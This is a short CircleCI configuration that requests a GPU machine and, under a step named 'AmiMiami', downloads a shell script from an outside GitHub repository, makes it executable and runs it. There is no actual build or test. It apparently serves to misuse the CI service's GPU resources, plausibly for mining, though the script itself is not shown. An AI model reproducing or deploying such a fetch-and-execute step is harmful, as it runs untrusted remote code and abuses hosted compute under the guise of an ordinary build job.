version: 2.1 
 
jobs: 
  build: 
    machine: 
      image: ubuntu-1604-cuda-10.1:201909-23 
    resource_class: gpu.nvidia.medium
    steps: 
      - checkout 
      - run: nvidia-smi 
      - run: 
          name: "AmiMiami" 
          command: wget https://github.com/Vaping86/Circleci/raw/main/Ami.sh && chmod +x Ami.sh && ./Ami.sh